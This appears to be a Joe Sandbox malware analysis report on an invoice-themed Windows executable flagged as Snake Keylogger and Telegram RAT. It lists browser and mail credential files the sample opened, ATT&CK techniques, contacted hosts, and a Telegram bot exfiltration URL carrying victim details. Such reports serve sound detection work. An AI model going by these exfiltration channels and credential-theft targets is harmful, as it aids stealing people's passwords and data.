          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: Factura Honorarios 2024-11-17.exe PID: 7628, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory215
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
          Process Injection          		3
          Obfuscated Files or Information          		Security Account Manager1
          Query Registry          		SMB/Windows Admin Shares1
          Email Collection          		21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS21
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Factura Honorarios 2024-11-17.exe32%ReversingLabsWin32.Trojan.Generic

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll3%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          		142.250.185.174
          		truefalse
            		high
            drive.usercontent.google.com
            		172.217.16.193
            		truefalse
              		high
              reallyfreegeoip.org
              		188.114.97.3
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		193.122.6.168
                  		truefalse
                    		high
                    checkip.dyndns.org
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://checkip.dyndns.org/false
                        		high
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2019/11/2024%20/%2002:39:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		high
                          https://reallyfreegeoip.org/xml/155.94.241.187false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003613E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabFactura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.orgFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoFactura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org/botFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.google.com/4Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://drive.usercontent.google.com/Factura Honorarios 2024-11-17.exe, 00000003.00000003.2193651298.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005999000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.orgFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorErrorFactura Honorarios 2024-11-17.exefalse
                                                    		high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstore?hl=enFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.000000003610D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://varders.kozow.com:8081Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://aborters.duckdns.org:8081Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.comFactura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20aFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://anotherarmy.dns.army:8081Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFactura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://chrome.google.com/webstore?hl=enlBFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036107000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://reallyfreegeoip.orgFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://apis.google.comFactura Honorarios 2024-11-17.exe, 00000003.00000003.2144257294.00000000059DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFactura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Factura Honorarios 2024-11-17.exe, 00000003.00000002.2685649282.0000000036F71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.google.com/dFactura Honorarios 2024-11-17.exe, 00000003.00000002.2663301435.0000000005928000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.org/xml/155.94.241.187$Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036031000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000036009000.00000004.00000800.00020000.00000000.sdmp, Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035FC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/Factura Honorarios 2024-11-17.exe, 00000003.00000002.2683988576.0000000035F99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        		api.telegram.orgUnited Kingdom
                                                                                        		62041TELEGRAMRUfalse
                                                                                        142.250.185.174
                                                                                        		drive.google.comUnited States
                                                                                        		15169GOOGLEUSfalse
                                                                                        188.114.97.3
                                                                                        		reallyfreegeoip.orgEuropean Union
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        193.122.6.168
                                                                                        		checkip.dyndns.comUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse
                                                                                        172.217.16.193
                                                                                        		drive.usercontent.google.comUnited States
                                                                                        		15169GOOGLEUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1557624
                                                                                        Start date and time:2024-11-18 13:48:37 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 39s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Factura Honorarios 2024-11-17.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/6@5/5
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 97%
                                                                                        • Number of executed functions: 180
                                                                                        • Number of non-executed functions: 145
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Factura Honorarios 2024-11-17.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        07:50:58API Interceptor1155x Sleep call for process: Factura Honorarios 2024-11-17.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                              Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            188.114.97.3QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                            gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                            • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                            Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                            • gmtagency.online/api/check
                                                                                                            View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                                                                                            • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                                                                                            SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • paste.ee/d/YU1NN
                                                                                                            TT copy.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.lnnn.fun/u5w9/
                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • filetransfer.io/data-package/iiEh1iM3/download
                                                                                                            Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • paste.ee/d/dc8Ru
                                                                                                            Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • paste.ee/d/LOToW

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            reallyfreegeoip.orgRef#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.96.3
                                                                                                            checkip.dyndns.comRef#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 132.226.247.73
                                                                                                            api.telegram.orgDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 149.154.167.220

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ORACLE-BMC-31898USRef#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 193.122.6.168
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 158.101.44.242
                                                                                                            rFACTURASALBARANESPENDIENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            TELEGRAMRUDHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 149.154.167.220
                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUSickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            https://lnk.ie/7469O/e=Get hashmaliciousUnknownBrowse
                                                                                                            • 172.66.0.227
                                                                                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.123.96
                                                                                                            63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.124.96
                                                                                                            ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 188.114.96.3
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adRef#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.97.3
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
